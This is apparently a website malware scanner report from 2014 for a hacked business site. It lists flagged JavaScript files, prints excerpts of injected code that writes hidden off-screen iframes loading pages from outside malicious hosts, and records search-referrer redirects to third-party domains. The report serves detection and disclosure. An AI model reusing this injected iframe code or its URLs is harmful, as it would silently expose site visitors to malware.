New scan:

Malware Scanner report for betterbusinesssolutionsinc.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
OK
Suspicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of suspicious redirects found:
->http://mdrightnow2014.com/

->http://doctorhecrew.com


The website "betterbusinesssolutionsinc.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/19
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://betterbusinesssolutionsinc.com/
200 OK
Content-Length: 23210
Content-Type: text/html
clean
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js
200 OK
Content-Length: 1674
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 471 bytes are skipped ...
br/>function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();

Antivirus reports:

ESET-NOD32
JS/Iframe.KK

http://betterbusinesssolutionsinc.com/media/system/js/caption.js
200 OK
Content-Length: 1094
Content-Type: application/x-javascript
clean
http://betterbusinesssolutionsinc.com/modules/mod_yoo_scroller/mod_yoo_scroller.js
200 OK
Content-Length: 1672
Content-Type: application/x-javascript
clean
http://betterbusinesssolutionsinc.com/modules/mod_yoo_search/mod_yoo_search.js
200 OK
Content-Length: 1094
Content-Type: application/x-javascript
clean
http://betterbusinesssolutionsinc.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1
200 OK
Content-Length: 5447
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 3929 bytes are skipped ...
.options);B.setStyles({display:"block","background-image":E,opacity:0});B.injectInside(D);D.addEvent("mouseenter",function(F){A.start({opacity:1})}.bind(this));D.addEvent("mouseleave",function(F){A.start({opacity:0})}.bind(this))}});YOOSpotlight.implement(new Options);window.addEvent("load",function(){new YOOSpotlight("div.spotlight, span.spotlight")});document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" wi

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]
Sophos
Mal/Iframe-AN
ESET-NOD32
JS/Iframe.KK

http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/base.js
200 OK
Content-Length: 1677
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 471 bytes are skipped ...
br/>function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();

Antivirus reports:

ESET-NOD32
JS/Iframe.KK

http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/accordionmenu.js
200 OK
Content-Length: 2527
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 1571 bytes are skipped ...
nsitions.linear, duration: 250 });

if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) {
fx.hide();
}

span.addEvent('click', function(){
fx.toggle();
});
}.bind(this));
}

});

YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499"

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]
Sophos
Mal/Iframe-AN

http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/fancymenu.js
200 OK
Content-Length: 1094
Content-Type: application/x-javascript
clean
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/dropdownmenu.js
200 OK
Content-Length: 1664
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 453 bytes are skipped ...
oUTCString()}}();
function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]

http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/yoo_tools.js
200 OK
Content-Length: 1094
Content-Type: application/x-javascript
clean
http://betterbusinesssolutionsinc.com/wthvideo/wthvideo.js
200 OK
Content-Length: 1664
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 453 bytes are skipped ...
oUTCString()}}();
function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]

http://betterbusinesssolutionsinc.com/index.php?option=com_contact&view=contact&id=1&Itemid=125
200 OK
Content-Length: 16275
Content-Type: text/html
clean
http://betterbusinesssolutionsinc.com/media/system/js/validate.js
200 OK
Content-Length: 5491
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
... 3529 bytes are skipped ...
abelref) {
$(el.labelref).addClass('invalid');
}
} else {
el.removeClass('invalid');
if (el.labelref) {
$(el.labelref).removeClass('invalid');
}
}
}
});
document.formvalidator = null;
Window.onDomReady(function(){
document.formvalidator = new JFormValidator();
});document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499"

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]
Sophos
Mal/Iframe-AN

http://betterbusinesssolutionsinc.com/index.php?option=com_content&view=article&id=116&Itemid=124
200 OK
Content-Length: 17527
Content-Type: text/html
clean

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://betterbusinesssolutionsinc.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: betterbusinesssolutionsinc.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 12:21:28 GMT
Location: http://mdrightnow2014.com/
Server: Apache
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
suspicious
URL: http://mdrightnow2014.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: mdrightnow2014.com
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Found
Connection: close
Date: Thu, 09 Oct 2014 12:21:28 GMT
Location: http://doctorhecrew.com
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3
suspicious

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=betterbusinesssolutionsinc.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://betterbusinesssolutionsinc.com/

Result: betterbusinesssolutionsinc.com is not infected or malware details are not published yet.